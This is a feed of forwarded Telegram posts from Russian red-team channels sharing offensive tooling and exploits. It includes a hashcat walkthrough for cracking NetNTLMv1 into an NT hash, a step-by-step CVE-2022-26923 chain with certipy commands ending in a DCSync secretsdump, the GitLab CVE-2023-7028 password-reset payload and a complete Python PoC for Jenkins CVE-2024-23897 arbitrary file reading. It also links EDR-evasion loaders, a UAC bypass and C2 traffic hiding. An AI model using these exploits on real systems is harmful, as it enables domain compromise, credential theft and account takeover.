Forwarded from Ralf Hacker Channel (Ralf Hacker)
Давно думал, публиковать свой софт или нет... Вот и решил для начала переписать Rubeus (не весь конечно) на C и перевести в COF файлы. В общем, из коробки работает с Cobalt Strike и Havoc😁😁
https://github.com/RalfHacker/Kerbeus-BOF
#bof #git #soft #redteam #pentest
https://github.com/RalfHacker/Kerbeus-BOF
#bof #git #soft #redteam #pentest
🔥15❤1
Forwarded from RedTeam brazzers (Pavel Shlundin)
Что делать, если на пентесте вы получили NetNTLMv1 хеш учетной записи? Как пример - вы можете выполнить ntlm relay атаку или восстановить NTLM хеш по радужной таблице на сервисе crack.sh. Но что то пошло не так...Но сервис crack.sh уже больше полугода не работает. Что же делать, когда Relay атака бесполезна, а радужных таблиц нет? Ответ простой - брутить! На самом деле NetNTLMv1 хеш состоит из 2 3 блоков зашифрованных с помощью DES. А про DES мы помним, что он какой то не безопасный. Далее описаны простые шаги, как вы можете перебрать всё пространство ключей с помощью утилиты Hashcat. Данная техника не нова, она много раз описана в интернете, но вспомнить этот метод будет не лишним перед следующим постом.
1. Получаем NetNTLMv1 хеш с помощью Responder, воспользовавшись флагами --lm и --disable-ess.
2. Если не хватает терпения разбить хеш на 3 равные части - качаем скрипт и запускаем следующим образом
3. Если вам хватило терпения и вы вручную разбили хеш на 3 равные части - допишем к нему Challenge и сформируем файл для брута в следующем виде (последнюю 3-ю часть не обязательно брутить, что с ней делать я расскажу позже)
4. Далее запускаем брут следующим образом
На 8 картах 1080Ti это займет максимум 6 суток.
На 4 картах 4090Ti это займет максимум 1 день и 13 часов.
5. Получим на выходе такой файл:
6. Теперь соберем блоки обратно в NTLM хеш
7. Помните мы 3-й блок не стали брутить? Все потому что восстановить оставшуюся часть NTLM хеша не составит труда, т.к. значимые данные занимают всего 2 байта, а остальное padding (Подробности на приложенном скрине). Восстановить данную часть мы можем мгновенно полным перебором на CPU.
8. Собираем NTLM хеш из полученных частей и можем использовать его для атак Pass The Hash, Over Pass The Ticket и Silver Ticket.
1. Получаем NetNTLMv1 хеш с помощью Responder, воспользовавшись флагами --lm и --disable-ess.
2. Если не хватает терпения разбить хеш на 3 равные части - качаем скрипт и запускаем следующим образом
python https://ntlmv1.py --nossp <ntlmv1_hash_nossp>
3. Если вам хватило терпения и вы вручную разбили хеш на 3 равные части - допишем к нему Challenge и сформируем файл для брута в следующем виде (последнюю 3-ю часть не обязательно брутить, что с ней делать я расскажу позже)
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
4. Далее запускаем брут следующим образом
hashcat -m 14000 -a 3 -1 /usr/share/hashcat/charsets/DES_full.hcchr --hex-charset des.file '?1?1?1?1?1?1?1?1'
На 8 картах 1080Ti это займет максимум 6 суток.
На 4 картах 4090Ti это займет максимум 1 день и 13 часов.
5. Получим на выходе такой файл:
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]
6. Теперь соберем блоки обратно в NTLM хеш
perl deskey_to_ntlm.pl 8923bdfdaf753f63
output= 8846f7eaee8fb1
perl deskey_to_ntlm.pl 17d741d7ddc1c36f
output= 17ad06bdd830b7
7. Помните мы 3-й блок не стали брутить? Все потому что восстановить оставшуюся часть NTLM хеша не составит труда, т.к. значимые данные занимают всего 2 байта, а остальное padding (Подробности на приложенном скрине). Восстановить данную часть мы можем мгновенно полным перебором на CPU.
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
output= 586c
8. Собираем NTLM хеш из полученных частей и можем использовать его для атак Pass The Hash, Over Pass The Ticket и Silver Ticket.
8846f7eaee8fb1 + 17ad06bdd830b7 + 586c
NT hash
8846f7eaee8fb117ad06bdd830b7586c
🔥17👍6❤1
📄 ADCS: New Ways to Abuse ManageCA Permissions
The Certsrv service exhibits a race condition during the creation of CRL files, any standard user with ManageCA ACL and publish the CDP and carry out arbitrary file movements, ultimately leading to domain elevation of privileges.
🔗 https://whoamianony.top/posts/ad-cs-new-ways-to-abuse-manageca-permissions/
#ad #adcs #manageca #privesc
The Certsrv service exhibits a race condition during the creation of CRL files, any standard user with ManageCA ACL and publish the CDP and carry out arbitrary file movements, ultimately leading to domain elevation of privileges.
🔗 https://whoamianony.top/posts/ad-cs-new-ways-to-abuse-manageca-permissions/
#ad #adcs #manageca #privesc
🔥9❤🔥1👍1
🔐 Exploiting WSUS with MITM for ADCS ESC8 Attack
Discover how attackers abuse misconfigured WSUS servers to escalate privileges through ADCS vulnerabilities. Delve into the intricacies of Windows Server Update Services and the potential risks associated with misconfigurations.
📝 Research:
https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html
#ad #adcs #wsus #mitm
Discover how attackers abuse misconfigured WSUS servers to escalate privileges through ADCS vulnerabilities. Delve into the intricacies of Windows Server Update Services and the potential risks associated with misconfigurations.
📝 Research:
https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html
#ad #adcs #wsus #mitm
👍8🔥3
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
🌐 The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools
See how SafeBreach Labs Researchers developed a brand new set of highly flexible process injection techniques that are able to completely bypass leading endpoint detection and response (EDR) solutions.
💉 PoolParty
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools.
PoolParty Variants:
1 - Overwrite the start routine of the target worker factory
2 - Insert TP_WORK work item to the target process's thread pool
3 - Insert TP_WAIT work item to the target process's thread pool
4 - Insert TP_IO work item to the target process's thread pool
5 - Insert TP_ALPC work item to the target process's thread pool
6 - Insert TP_JOB work item to the target process's thread pool
7 - Insert TP_DIRECT work item to the target process's thread pool
8 - Insert TP_TIMER work item to the target process's thread pool
See how SafeBreach Labs Researchers developed a brand new set of highly flexible process injection techniques that are able to completely bypass leading endpoint detection and response (EDR) solutions.
💉 PoolParty
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools.
PoolParty Variants:
1 - Overwrite the start routine of the target worker factory
2 - Insert TP_WORK work item to the target process's thread pool
3 - Insert TP_WAIT work item to the target process's thread pool
4 - Insert TP_IO work item to the target process's thread pool
5 - Insert TP_ALPC work item to the target process's thread pool
6 - Insert TP_JOB work item to the target process's thread pool
7 - Insert TP_DIRECT work item to the target process's thread pool
8 - Insert TP_TIMER work item to the target process's thread pool
👍11❤1
Forwarded from 1N73LL1G3NC3
AtlasLdr
Reflective x64 PE/DLL Loader implemented using Dynamic Indirect Syscalls
Features:
Reflective x64 PE/DLL Loader implemented using Dynamic Indirect Syscalls
Features:
* Retrieve of DLL and PE from a remote server
* Manual Mapping on a remote process
* Position independent code
* Use of indirect Syscalls
- ZwAllocateVirtualMemory
- ZwProtectVirtualMemory
- ZwQuerySystemInformation
- ZwFreeVirtualMemory
- ZwCreateThreadEx
* Single stub for all Syscalls
- Dynamic SSN retrieve
- Dynamic Syscall address resolution
* Atlas also uses
- LdrLoadDll
- NtWriteVirtualMemory
* Custom implementations of
- GetProcAddress
- GetModuleHandle
* API hashing
* Cleanup on error
* Variable EntryPoint
❤6🔥4👍2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
SMTP Smuggling - Spoofing E-Mails Worldwide. Очень крутой, при этом подробный ресерч. Вкратце, благодаря смаглу сообщений, позволяет отправить сообщение от имени любого пользователя почтового сервера в обход фильтров.
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
P.S. Ну и судя по реакции вендоров, они того рот ... патчить это дело😁 А значит ждем много отчётов об апте, использующей данный метод
#initial #fishing #pentest #redteam
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
P.S. Ну и судя по реакции вендоров, они того рот ... патчить это дело😁 А значит ждем много отчётов об апте, использующей данный метод
#initial #fishing #pentest #redteam
👍13🔥3❤2👎2
Forwarded from 1N73LL1G3NC3
Stinger
CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as Administrator
CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as Administrator
GitHub
GitHub - hackerhouse-opensource/Stinger: CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated…
CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as Administrator. - hackerhouse-opensource/Stinger
🔥7👍1
Forwarded from PT SWARM
New article by our researcher @snovvcrash: "Python ❤️ SSPI: Teaching #Impacket to Respect Windows SSO".
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
PT SWARM
Python ❤️ SSPI: Teaching Impacket to Respect Windows SSO
One handy feature of our private Impacket (by @fortra) fork is that it can leverage native SSPI interaction for authentication purposes when operating from a legit domain context on a Windows machine. As far as the partial implementation of Ntsecapi represents…
🔥12
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:[email protected]' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u [email protected] -p password -ca 'CA NAME' -template User -upn [email protected] -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18❤🔥4👍2
Forwarded from Управление Уязвимостями и прочее
Курьёзная критичная уязвимость в GitLab - восстановление пароля от аккаунта на левый email (CVE-2023-7028). 🤦♂️🙂 Уязвимы версии GitLab CE/EE с 16.1.0. CVSS 10. Патчи доступны.
Как это произошло?
В версии 16.1.0 было внесено изменение, позволяющее пользователям сбрасывать свой пароль используя дополнительный адрес электронной почты. Уязвимость является результатом ошибки в процессе верификации электронной почты.
В микроблогах пишут, что PoC буквально такой:
Пользователи, у которых включена двухфакторная аутентификация, уязвимы для сброса пароля, но не для захвата учетной записи, поскольку для входа в систему требуется второй фактор аутентификации.
Двухфакторка рулит. GitLab - решето. 🙂
@avleonovrus #GitLab
Как это произошло?
В версии 16.1.0 было внесено изменение, позволяющее пользователям сбрасывать свой пароль используя дополнительный адрес электронной почты. Уязвимость является результатом ошибки в процессе верификации электронной почты.
В микроблогах пишут, что PoC буквально такой:
user[email][][email protected]&user[email][][email protected]
Пользователи, у которых включена двухфакторная аутентификация, уязвимы для сброса пароля, но не для захвата учетной записи, поскольку для входа в систему требуется второй фактор аутентификации.
Двухфакторка рулит. GitLab - решето. 🙂
@avleonovrus #GitLab
🔥10❤2👍1
Forwarded from Похек (Sergey Zybnev)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤2
Forwarded from Offensive Xwitter
😈 [ Octoberfest7 @Octoberfest73 ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
🔥8👍1
Learn the process of crafting a personalized RDI/sRDI loader in C and ASM, incorporating code optimization to achieve full position independence.
🔗 https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/
#maldev #reflective #dll #clang #asm
Please open Telegram to view this post
VIEW IN TELEGRAM
Malicious Group
Writing your own RDI /sRDI loader using C and ASM
In this post, I am going to show the readers how to write their own RDI/sRDI loader in C, and then show how to optimize the code to make it fully position independent.
🔥12👍2
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py https://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py https://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤🔥4❤2🔥1
😴 Creating Object File Monstrosities with Sleep Mask and LLVM
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
👍5
298559809-27f286d7-e0e3-47ab-864a-e040f8749708.mp4
1.2 MB
This vulnerability targets the Common Log File System (CLFS) and allows attackers to escalate privileges and potentially fully compromise an organization’s Windows systems. In April 2023, Microsoft released a patch for this vulnerability and the CNA CVE-2023-28252 was assigned.
📊 Affects version:
— Windows 11 21H2 (clfs.sys version 10.0.22000.1574);
— Windows 11 22H2;
— Windows 10 21H2;
— Windows 10 22H2;
— Windows Server 2022.
Research:
🔗 https://www.coresecurity.com/core-labs/articles/analysis-cve-2023-28252-clfs-vulnerability
Exploit:
🔗 https://github.com/duck-sec/CVE-2023-28252-Compiled-exe
#windows #privesc #clfs #driver
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10